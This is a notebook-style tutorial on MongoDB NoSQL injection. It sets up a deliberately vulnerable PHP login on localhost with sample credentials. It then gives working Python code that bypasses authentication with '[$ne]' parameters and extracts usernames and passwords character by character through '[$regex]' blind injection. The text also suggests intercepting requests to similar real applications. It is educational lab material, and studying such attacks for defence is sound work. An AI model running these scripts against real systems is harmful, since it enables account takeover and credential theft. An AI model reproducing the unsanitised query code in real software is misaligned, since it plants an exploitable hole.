## MongoDB NoSQL Injection Playbook
Welcome to this notebook in which I demonstrate two ways to abuse MongoDB login systems.

The code in this notebook is able to bypass authentication and exfiltrate sensitive information (usernames and passwords).

## Disclaimer
This is for educational purposes only! Do not use it against targets you don't own or are not allowed to use it against! I am not responsible for whatever you do with this.


## Preparation
I installed MongoDB on my system (operating system doesn't really matter) and added the MongoDB driver to my PHP installation.
The easiest way to do this (on Windows) seems to be XAMPP, but feel free to use other methods.

## Login code
Here's the - not *that* sophisticated - login system in PHP:
```
<?php
    // should be the same for all default MongoDB installations
    $mng = new MongoDB\Driver\Manager("mongodb://localhost:27017");
    $qry = new MongoDB\Driver\Query([]);

    if(isset($_POST['login'])) {
      $postedUsername = $_POST['username'];
      $postedPassword = $_POST['password'];

      $filter = ['username' => $postedUsername, 'password' => $postedPassword];
      $query = new MongoDB\Driver\Query($filter);
      $rows = $mng->executeQuery('exploit.users', $query);
      $found_user = false;

      foreach ($rows as $row) {
        $found_user = true;
      }
    
      if($found_user == true) {
        echo "Login succeeded";
      } else {
        echo "Login failed";
      }
    } 
?>
```

I saved this to `login.php` and put it in my `htdocs` folder: `nosql/login.php`.

I then added the following users to the collection `exploit.users`:

```
[{
  "_id": {
    "$oid": "60e4651a6aa8f5f72049dad6"
  },
  "username": "admin",
  "password": "nimda"
},{
  "_id": {
    "$oid": "60e465446aa8f5f72049dad7"
  },
  "username": "root",
  "password": "Qald]b!Z_d5Kn"
},{
    "_id": {
     "$oid": "60e5d07b8a81ae580018cbbb"
    },
    "username":"third",
    "password":"AB_.#+*[]{}()!$4"
  }
]
```

## Login bypass
In order to bypass, we first need to try and authenticate (this will fail, of course).
If you don't have requests installed, run `pip install requests` before running this code.

In [ ]:
# pip install requests
import requests
data = {
    "username": "steps0x29a",
    "password": "steps0x29a",
    "login": "login"
}
x = requests.post('http://localhost/nosql/login.php', data=data, allow_redirects=False)
print(x.text)


As you can see, we pass wrong credentials to the login page and receive `Login failed` as a response (as expected).
Now, let's bypass the authentication by modifying the input data as below:

In [ ]:
data = {
    "username[$ne]": "steps0x29a",
    "password[$ne]": "steps0x29a",
    "login": "login"
}
x = requests.post('http://localhost/nosql/login.php', data=data, allow_redirects=False)
print(x.text)

## What happened here?
As you can see we modify the parameters that we pass to the login page by appending `[$ne]` to both of them. 
That modifier means "not equal to" - we are essentially telling MongoDB that it should search for users that are *not* named 'steps0x29a' and *not* have 'steps0x29a' set as their password. And yes, that actually works!

## How can this be exploited?
You could intercept HTTP requests you make to an application that uses a similar authentication mechanism in your browser and bypass the login, effectively getting access to protected information. burpsuite for example allows on-the-fly modifications of requests and responses. 

# Leaking information
Alright, we now know how to bypass the authentication, let's exfiltrate some data from the database.
First, we need a set of characters to try in a bruteforce attack, so let's build it:

In [ ]:
import string
import re 

alphabet = string.printable

print(alphabet)

As the attack will rely on regular expressions, we need to escape some of them (that's what `re.escape` is used for). After that, we are ready to go.

In [ ]:
def test_username(username:str) -> bool:
  data = { "username[$regex]": f"^{username}$", "password[$ne]":"steps0x29a", "login": "login" } 
  x = requests.post('http://localhost/nosql/login.php', data, allow_redirects=False)
  return "Login succeeded" in x.text
    
def bruteforce_user(seed:str='') -> str:
  username = seed
 
  while True:
    for a in alphabet:
      payload = f"{username}{re.escape(a)}"
      print(f"\r{payload}", flush=True, end='')
      data = { "username[$regex]": f"^{payload}.*$", "password[$ne]":"steps0x29a", "login": "login" } 
      x = requests.post('http://localhost/nosql/login.php', data, allow_redirects=False)
      if "Login succeeded" in x.text:
        username = f"{username}{a}"
        if test_username(username):
          print()
          return username
        break
  return None 

print(f'Username found: {bruteforce_user()}')


There's a lot going on here, so let's walk through this step by step.

## Bruteforcing a username
We start off with an empty username and loop through all the characters in our character set, appending one character to our username at a time. We then send it to the login page, but this time using `[$regex]` as a modifier. This modifier lets us use regex to match things in the database, e.g. usernames. This essentially means that we can ask MongoDB whether there's a username starting with 'a', 'b', ... and so on. As we still use `[$ne]` to bypass the login, the login will succeed when a character is matched.

## Verifying usernames
As we iterate over the characters inside an endless loop, we need some way of determining whether or not we have found a valid username, not just the beginning of it. That is what `test_username` is for. It uses a slightly different regex to determine whether or not a given username is actually a complete one.

## Finding more usernames
The problem with this code is that it will find one and only one username (the first match). In order to find another user, we can use the `seed` parameter as follows:

In [ ]:
print(f'Another username: {bruteforce_user(seed="r")}')

## Getting a user's password
Now we know two usernames. Let's get their passwords (it's the same method, so no more explanation required):

In [ ]:
def test_password(username:str, password:str) -> bool:
  data = { "username[$regex]": f"^{username}$", "password[$regex]": f"^{password}$", "login": "login" } 
  x = requests.post('http://localhost/nosql/login.php', data, allow_redirects=False)
  return "Login succeeded" in x.text

def bruteforce_password(username, seed='') -> str:
  password = seed
 
  while True:
    for a in alphabet:
      payload = f"{password}{re.escape(a)}"
      print(f"\r{payload}", flush=True, end='')
      data = { "username": username, "password[$regex]":f"^{payload}", "login": "login" } 
      x = requests.post('http://localhost/nosql/login.php', data, allow_redirects=False)
      if "Login succeeded" in x.text:
        password = f"{password}{a}"
        if test_password(username, password):
          print()
          return password
        break
  return None

print(f"Admin password: {bruteforce_password('admin')}")
print(f"root password: {bruteforce_password('root')}")

## Issues
Special characters are sometimes weird and can lead to false positives or false negatives. Escaping works quite well, but can fail as well. I'll demonstrate with the third user:


In [ ]:
print("AB_.#+*[]{}()!$4")
print(f"Third user's password: {bruteforce_password('third')}")

As you can see, the result is an endless loop and a false positive password of `AB_.#+++`.
The asterisk character as a special character seems to be problematic even when escaping it beforehand. I did not find a solution to this problem as of now.
